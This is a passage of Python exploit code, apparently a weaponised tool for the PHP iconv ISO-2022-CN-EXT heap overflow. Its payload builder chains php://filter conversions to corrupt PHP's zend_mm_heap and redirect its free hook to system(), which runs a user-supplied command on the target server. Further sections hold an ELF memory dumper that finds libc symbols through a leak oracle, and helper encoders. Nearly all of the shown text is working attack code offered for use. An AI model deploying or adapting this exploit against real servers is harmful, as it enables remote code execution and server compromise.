To trigger the overflow in step3, we convert from UTF-8 to ISO-2022-CN-EXT.
Since step2 creates chunks that contain pointers and pointers are generally not
UTF-8, we cannot afford to have that conversion happen on the chunks of step2.
To avoid this, we put the chunks in step2 at the very end of the chain, and
prefix them with `0\n`. When dechunked (right before the iconv), they will
"disappear" from the chain, preserving them from the character set conversion
and saving us from an unwanted processing error that would stop the processing
chain.
After step3 we have a corrupted freelist with an arbitrary pointer into it. We
don't know the precise layout of the heap, but we know that at the top of the
heap resides a zend_mm_heap structure. We overwrite this structure in two ways.
Its free_slot[] array contains a pointer to each free list. By overwriting it,
we can make PHP allocate chunks whereever we want. In addition, its custom_heap
field contains pointers to hook functions for emalloc, efree, and erealloc
(similarly to malloc_hook, free_hook, etc. in the libc). We overwrite them and
then overwrite the use_custom_heap flag to make PHP use these function pointers
instead. We can now do our favorite CTF technique and get a call to
system(<chunk>).
We make sure that the "system" command kills the current process to avoid other
system() calls with random chunk data, leading to undefined behaviour.
The pad blocks just "pad" our allocations so that even if the heap of the
process is in a random state, we still get contiguous, in order chunks for our
exploit.
Therefore, the whole process described here CANNOT crash. Everything falls
perfectly in place, and nothing can get in the middle of our allocations.
"""
ADDR_EMALLOC = self.malloc
ADDR_EFREE = self.system
ADDR_EREALLOC = self.realloc
ADDR_HEAP = self.heap
ADDR_FREE_SLOT = ADDR_HEAP + 0x20
ADDR_CUSTOM_HEAP = ADDR_HEAP + 0x0168
ADDR_FAKE_BIN = ADDR_FREE_SLOT - 0x10
CS = 0x100
# Pad needs to stay at size 0x100 at every step
pad_size = CS - 0x18
pad = b"\x00" * pad_size
pad = self.russian_doll(pad, -6, -6, -6)
step1_size = 1
step1 = b"\x00" * step1_size
step1 = self.russian_doll(step1, 0, 0, CS)
# Since these chunks contain non-UTF-8 chars, we cannot let it get converted to
# ISO-2022-CN-EXT. We add a `0\n` that makes the 4th and last dechunk "crash"
step2_size = 0x48
step2 = b"\x00" * (step2_size + 8)
step2 = self.russian_doll(step2, CS, 0)
step2_write_ptr = b"0\n".ljust(step2_size, b"\x00") + p64(ADDR_FAKE_BIN)
step2_write_ptr = self.russian_doll(step2_write_ptr, CS, 0)
step3_size = CS
step3_overflow = b"\x00" * (step3_size - len(BUG)) + BUG
assert len(step3_overflow) == CS
step3_overflow = self.russian_doll(step3_overflow, 0, 0, 0)
step4_size = CS
step4 = b"=00" + b"\x00" * (step4_size - 1)
step4 = self.russian_doll(step4, 0, 0, 0)
def ptr_bucket(*ptrs, size=None) -> bytes:
"""Creates a 0x8000 chunk that reveals pointers after every step has been ran."""
if size is not None:
assert len(ptrs) * 8 == size
bucket = b"".join(map(p64, ptrs))
bucket = qpe(bucket)
bucket = self.russian_doll(bucket, 0, 0, 0)
return bucket
# This chunk will eventually overwrite mm_heap->free_slot
# it is actually allocated 0x10 bytes BEFORE it, thus the two filler values
step4_pwn = ptr_bucket(
0x200000,
0,
# free_slot
0,
0,
ADDR_CUSTOM_HEAP, # 0x18
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
ADDR_HEAP, # 0x140
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
0,
size=CS,
)
step4_custom_heap = ptr_bucket(
ADDR_EMALLOC, ADDR_EFREE, ADDR_EREALLOC, size=0x18
)
step4_use_custom_heap_size = 0x140
COMMAND = self.command
COMMAND = f"kill -9 $PPID; {COMMAND}"
if self.sleep:
COMMAND = f"sleep {self.sleep}; {COMMAND}"
COMMAND = COMMAND.encode() + b"\x00"
assert (
len(COMMAND) <= step4_use_custom_heap_size
), f"Command too big ({len(COMMAND)}), it must be strictly inferior to {hex(step4_use_custom_heap_size)}"
COMMAND = COMMAND.ljust(step4_use_custom_heap_size, b"\x00")
step4_use_custom_heap = COMMAND
step4_use_custom_heap = qpe(step4_use_custom_heap)
step4_use_custom_heap = self.russian_doll(step4_use_custom_heap, 0, 0, 0)
pages = (
step4 * 3
+ step4_pwn
+ step4_custom_heap
+ step4_use_custom_heap
+ step3_overflow
+ pad * 20
+ step1 * 3
+ step2_write_ptr
+ step2 * 2
)
resource = self._data_to_resource(pages)
filters = [
# Create buckets
"zlib.inflate",
"zlib.inflate",
# Step 0: Setup heap
"dechunk",
"convert.iconv.L1.L1",
# Step 1: Reverse FL order
"dechunk",
"convert.iconv.L1.L1",
# Step 2: Put fake pointer and make FL order back to normal
"dechunk",
"convert.iconv.L1.L1",
# Step 3: Trigger overflow
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
# Step 4: Allocate at arbitrary address and change zend_mm_heap
"convert.quoted-printable-decode",
"convert.iconv.L1.L1",
]
filters = "|".join(filters)
path = f"php://filter/read={filters}/resource={resource}"
start = time.time()
try:
self.remote.oracle(path)
except:
self.logger.exception("The oracle raised an exception (although that could be normal)")
msg_print()
if not self.sleep:
msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/] [i](probably)[/]"))
elif start + self.sleep <= time.time():
msg_print(Align.center("[b white on black] EXPLOIT [/][b white on green] SUCCESS [/]"))
else:
msg_print(Align.center("[b white on black] EXPLOIT [/][b white on red] FAILURE [/]"))
msg_print()
@dataclass
class LinkedBruteforcer(Bruteforcer):
exploit: Exploit
filters: list[str]
resource: str
HEADER = ""
def __post_init__(self) -> None:
super().__init__(0)
self.logger = logger(self.__class__.__name__)
@classmethod
def compute_write(cls, filters: list[str]) -> str:
"""To make sure that the heap does not change too much, we add dummy filters so
that PHP creates the associated structures. They do not impact our exploit, as
they are write filters. However, they will be called when the stream is finally
freed, at the end of the execution. We thus convert any funky charset to latin1,
to make sure PHP does not report errors. This also makes sure that the length of
the path is always the same.
Although this is very helpful, this is not perfect. The order in which the
filters are created matters as well. However, we cannot control this perfectly.
"""
filters = Counter(filters)
missing = []
for filter, number in cls.FILTER_USAGE.items():
used = filters.get(filter, 0)
if filter.startswith("convert.iconv."):
_, _, ffrom, fto = filter.split(".")
if len(ffrom) >= 2:
ffrom = "L1".ljust(len(ffrom), " ")
if len(fto) >= 2:
fto = "L1".ljust(len(fto), " ")
filter = f"convert.iconv.{ffrom}.{fto}"
if used < number:
missing += [filter] * (number - used)
# assert (Counter(missing) + Counter(filters) == Counter(cls.FILTER_USAGE))
return "|".join(missing)
def send(self, filters: str) -> bool:
"""Sends a filter chain with the given filters, and returns True if the
expansion happened.
"""
filters = [filter for filter in filters.split("|") if filter]
filters = self.filters + filters
return self.exploit.oracle(filters, self.resource)
def put(buffer: bytearray, position: int, data: bytes) -> None:
if position < 0:
position = len(buffer) + position
buffer[position : position + len(data)] = data
@dataclass
class MemoryDumper:
exploit: Exploit
base: int
log = logger("MemoryDumper")
def dump(self, address: int, size: int, message: str = None) -> bytes:
address += self.base
self.log.debug(f"Dumping memory at {address:#x} for {size:#x} bytes")
return self.exploit.dump_memory(address, size, message=message)
def expect(self, address: int, expected: bytes) -> bool:
address += self.base
self.log.debug(f"Dumping memory at {address:#x} expecting {expected.hex()}")
return self.exploit.expect_memory(address, expected)
def unpack(self, address: int, format: str, message: str = None) -> tuple:
data = self.dump(address, struct.calcsize(format), message=message)
return struct.unpack(format, data)
def offset(self, address: int) -> MemoryDumper:
return MemoryDumper(self.exploit, self.base + address)
@dataclass
class ELFDumper(MemoryDumper):
"""Provides helpers to dump an ELF file from memory.
"""
# Program header types
DT_NEEDED = 1
DT_DYNAMIC = 2
# Dynamic segment types
DT = {
"STRTAB": 0x05,
"SYMTAB": 0x06,
"JMPREL": 0x17,
"GNU_HASH": 0x6FFFFEF5,
}
dynamic_section: MemoryDumper = field(init=False)
segments: dict[str, MemoryDumper] = field(init=False, default_factory=dict)
gnu_hash_info: dict[str, int] = field(init=False, default=None)
def identify(self) -> None:
self.expect(0, b"\x7fELF")
self.expect(5, b"\x02") # x64
self.expect(6, b"\x01") # little endian
def setup_gnu_hash(self) -> None:
self.get_dynamic_section()
self.get_dynamic_segments("STRTAB", "SYMTAB", "GNU_HASH")
self.parse_gnu_hash()
def find_some_libc_function(self) -> int:
"""Finds the address of a libc function in the JMPREL section.
"""
rela = self.segments["JMPREL"]
symtab = self.segments["SYMTAB"]
strtab = self.segments["STRTAB"]
libc_functions = to_bytes(table.read("libc-functions.list"))
# Go through the .rela.plt section looking for a function name that matches
# one of the libc functions
for i in track(range(0, 0x2000, 0x18), "Looking for a libc function in the [i]JMPREL[/] section"):
# the 4 MSB of r_info are the index of the symbol in the symbol table
r_info, = rela.unpack(i + 8 + 4, "<I")
# offset of the name in the str table
st_name = u32(symtab.dump(0x18 * r_info, 3) + b"\x00")
# Dump 3 characters at a time until we find a null byte
# If at any point, the name cannot be a libc function, bail out
name = b""
while any(libc_function.startswith(name) for libc_function in libc_functions):
name += strtab.dump(st_name + len(name), 3)
if (end := name.find(b"\x00")) != -1:
name = name[:end]
break
if name in libc_functions:
break
else:
failure("Could not find any libc function in the [i]JMPREL[/] section")
name = name.decode()
with msg_status(f"Dumping address of [i]{name}@libc[/]"):
r_offset, = rela.unpack(i + 0, "<I")
address, = self.unpack(r_offset, '<Q')
msg_success(f"Found libc function: [i]{name}[/] at {addr(address)}")
return address
def get_symbol(self, name: str) -> int:
"""Go through .dynsym to find a symbol. Slow.
"""
name = name.encode() + b"\x00"
symtab = self.segments["SYMTAB"]
strtab = self.segments["STRTAB"]
for symbol in itertools.count(0, 0x18):
# We expect strtab to be of size 0xffffff or less, and thus only dump 3
# bytes. This reduces the time required to find the symbol.
st_name = u32(symtab.dump(symbol, 3) + b"\x00")
if strtab.expect(st_name, name):
st_value, = symtab.unpack(symbol + 8, '<Q')
msg_info(f"Got address of symbol {name}: {st_value:#x}")
return st_value
def get_dynamic_section(self) -> None:
"""Finds DT_DYNAMIC in the program headers and obtains its virtual offset."""
with msg_status("Parsing ELF header"):
(e_phoff,) = self.unpack(0x20, "<Q")
e_phentsize, e_phnum = self.unpack(0x36, "<HH")
msg_info(f"ELF contains [i]{e_phnum}[/] program headers")
self.log.info(
f"Got {e_phnum} program headers in ELF, at offset {e_phoff:#x}, size {e_phentsize:#x}"
)
for i in track(
range(e_phnum), "Looking for the [i]DT_DYNAMIC[/] program header"
):
program_header = e_phoff + i * e_phentsize
# TODO CAREFUL about the endianness
# TODO Careful about PIEness
if self.expect(program_header, p32(self.DT_DYNAMIC)):
break
else:
failure("[i]DT_DYNAMIC[/] program header not found")
msg_info(f"Found [i]DT_DYNAMIC[/] program header at offset {addr(program_header)}")
with msg_status("Parsing [i]DT_DYNAMIC[/] program header"):
(p_vaddr,) = self.unpack(program_header + 0x10, "<Q")
# Truncating to 4 bytes only, the size should not be bigger
(p_memsz,) = self.unpack(program_header + 0x28, "<I")
msg_info(f"Got virtual offset for [i]DT_DYNAMIC[/] at {addr(p_vaddr)}, size {p_memsz:#x}")
self.dynamic_section = self.offset(p_vaddr)
self.dynamic_section.size = p_memsz
def parse_gnu_hash(self) -> None:
"""Parses the GNU hash table to find the address of a symbol."""
# Read the GNU hash table header
with msg_status("Dumping [i]GNU_HASH[/] header"):
nbuckets, symndx, maskwords, shift2 = self.segments["GNU_HASH"].unpack(0, "<IIII")
msg_info(
f"Got [i]GNU_HASH[/] header: nbuckets={nbuckets}, symndx={symndx}, maskwords={maskwords}, shift2={shift2}"
)
# Calculate the addresses of the bloom filter, hash buckets, and hash values
bloom_filter_offset = 16
hash_buckets_offset = bloom_filter_offset + (maskwords * 8)
hash_values_offset = hash_buckets_offset + (nbuckets * 4)
# msg_info(f"Bloom filter offset: {bloom_filter_offset:#x}")
# msg_info(f"Hash buckets offset: {hash_buckets_offset:#x}")
# msg_info(f"Hash values offset: {hash_values_offset:#x}")
self.gnu_hash_info = {
"nbuckets": nbuckets,
"symndx": symndx,
"maskwords": maskwords,
"shift2": shift2,
"bloom_filter_addr": bloom_filter_offset,
"hash_buckets_offset": hash_buckets_offset,
"hash_values_offset": hash_values_offset,
}
def get_dynamic_segments(self, *entries: str) -> None | NoReturn:
"""Looks for tags in the dynamic section.
"""
ds = self.dynamic_section
# Iterate through the dynamic section, looking for specific entries
# TODO We didn't dump the size, so we might iterate endlessly if an entry is not
# found
for element in track(range(0, ds.size, 0x10), "Looking for interesting dynamic segments"):
# We cheat and only dump 1 byte instead of the 8 constituting the tag.
(d_tag_lsb,) = ds.dump(element, 1)
for entry in entries:
if entry in self.segments:
continue
if d_tag_lsb == self.DT[entry] & 0xFF:
break
else:
continue
(d_val,) = ds.unpack(element + 8, "<Q")
msg_info(f"Got address for [i]{entry}[/] at {addr(d_val)}")
self.segments[entry] = MemoryDumper(self.exploit, d_val)
if all(item in self.segments for item in entries):
break
else:
missing = ", ".join(f"[i]{entry}[/]" for entry in set(entries) - set(self.segments))
failure(f"Could not find {missing} segments in dynamic section")
def compute_hash(self, name: str) -> int:
"""Computes the bloom hash of the given symbol name."""
h = 5381
for c in name:
h = (h << 5) + h + ord(c)
return h & 0xFFFFFFFF
def find_symbol_from_hash(self, name: str) -> int:
"""Finds the address of the given symbol name using the GNU_HASH section."""
gh = self.segments["GNU_HASH"]
symtab = self.segments["SYMTAB"]
strtab = self.segments["STRTAB"]
with msg_status(f"Looking for address of [i]{name}[/] using [i]GNU_HASH[/]"):
gnu_hash_info = self.gnu_hash_info
nbuckets = gnu_hash_info["nbuckets"]
symndx = gnu_hash_info["symndx"]
hash_buckets_offset = gnu_hash_info["hash_buckets_offset"]
hash_values_offset = gnu_hash_info["hash_values_offset"]
# Compute the hash of the symbol name
hash = self.compute_hash(name)
bname = name.encode() + b"\x00"
bucket = hash % nbuckets
# Get the symbol index from the hash bucket
sym_index_offset = hash_buckets_offset + (bucket * 4)
(sym_index,) = gh.unpack(sym_index_offset, "<I")
if sym_index == 0:
raise ValueError(f"Symbol {name} not found")
# Iterate through the hash values to find the symbol
for i in itertools.count(sym_index, 1):
hash_value_addr = hash_values_offset + ((i - symndx) * 4)
(hash_value,) = gh.unpack(hash_value_addr, "<I")
if (hash_value & ~1) == (hash & ~1):
(st_name,) = symtab.unpack(i * 24, "<I")
# msg_debug(
# f"Found symbol {name} at index {st_name:#x} with hash {hash_value:#x}"
# )
if strtab.expect(st_name, bname):
(st_value,) = symtab.unpack((i * 24) + 8, "<Q")
# msg_success(
# f"Got address of symbol [i]{name}[/]: {addr(st_value)}"
# )
return st_value
if hash_value & 1:
break
raise ValueError(f"Symbol {name} not found")
class UnexpectedBytesException(Exception):
"""Raised when the bytes that were dumped are not what was expected.
"""
def compress(data: bytes) -> bytes:
"""Returns compressed data, suitable for `zlib.inflate`."""
# NOTE This does not decompress properly in some cases. I don't know why.
# Remove 2-byte header and 4-byte checksum
# old = zlib.compress(data, 9)[2:-4]
# print(len(old))
object = zlib.compressobj(level=9, wbits=-15, memLevel=9)
new = object.compress(data) + object.flush()
# print(len(new))
return new
def b64(data: bytes, misalign=True) -> bytes:
payload = base64.encode(data)
if not misalign and payload.endswith("="):
raise ValueError(f"Misaligned: {data}")
return payload.encode()
def compressed_bucket(data: bytes) -> bytes:
"""Returns a chunk of size 0x8000 that, when dechunked, returns the data."""
return chunked_chunk(data, 0x8000)
def qpe(data: bytes) -> bytes:
"""Emulates quoted-printable-encode."""
return "".join(f"={x:02x}" for x in data).upper().encode()
def chunked_chunk(data: bytes, size: int = None) -> bytes:
"""Constructs a chunked representation of the given chunk. If size is given, the
chunked representation has size `size`.
For instance, `ABCD` with size 10 becomes: `0004\nABCD\n`.
"""
# The caller does not care about the size: let's just add 8, which is more than
# enough
if size is None:
size = len(data) + 8
keep = len(data) + len(b"\n\n")
size = f"{len(data):x}".rjust(size - keep, "0")
return size.encode() + b"\n" + data + b"\n"
def option_help(name: str) -> str:
"""Returns a string that can be used to display the help for the given option."""
return f"[black]({name})[/]"
def addr(address: int) -> str:
return f"[magenta]{address:#x}[/]"
class Filters:
"""A collection of filters used in the exploit."""
REV_2 = "convert.iconv.UTF-16LE.UTF-16BE"
REV_4 = "convert.iconv.UCS-4LE.UCS-4"
ADD3 = [
"convert.base64-encode",
"convert.iconv.UTF8.CSISO2022KR",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.JS.UNICODE",
"convert.iconv.L4.UCS2",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.UTF8.CSISO2022KR",
"convert.base64-decode",
"convert.base64-encode",
"convert.iconv.UTF8.CSISO2022KR",
"convert.base64-decode",
]
DITCH_4 = (
ADD3
+ [REV_4]
+ ADD3
+ ["convert.base64-decode", "convert.base64-encode"]
+ [REV_2]
)
REMOVE_EQUALS = [
"convert.iconv.L1.UTF7",
"convert.base64-decode",
"convert.base64-encode",
]
QUARTET_DIGITS = [
[], # 1
[REV_2], # 2
[REV_4, REV_2], # 3
[REV_4], # 4
]
@staticmethod
def base(mid: int) -> list:
"""Gets a list of base filters. `mid` indicates the number of times we dechunk
into L1.
"""
return (
[
"zlib.inflate",
"zlib.inflate",
]
+ [
"dechunk",
"convert.iconv.L1.L1",
]
* mid
+ [
"dechunk",
"convert.iconv.UTF-8.ISO-2022-CN-EXT",
]
)
def p64(value):
"""Pack a 64-bit integer into a byte string."""
return struct.pack('<Q', value)
def u64(value):
"""Unpack a 64-bit integer from a byte string."""
return struct.unpack('<Q', value)[0]
def p32(value):
"""Pack a 32-bit integer into a byte string."""
return struct.pack('<I', value)
def u32(value):
"""Unpack a 32-bit integer from a byte string."""
return struct.unpack('<I', value)[0]
def unhex(value: str) -> int:
"""Converts an hex string to an integer."""
return int(value, 16)
Exploit()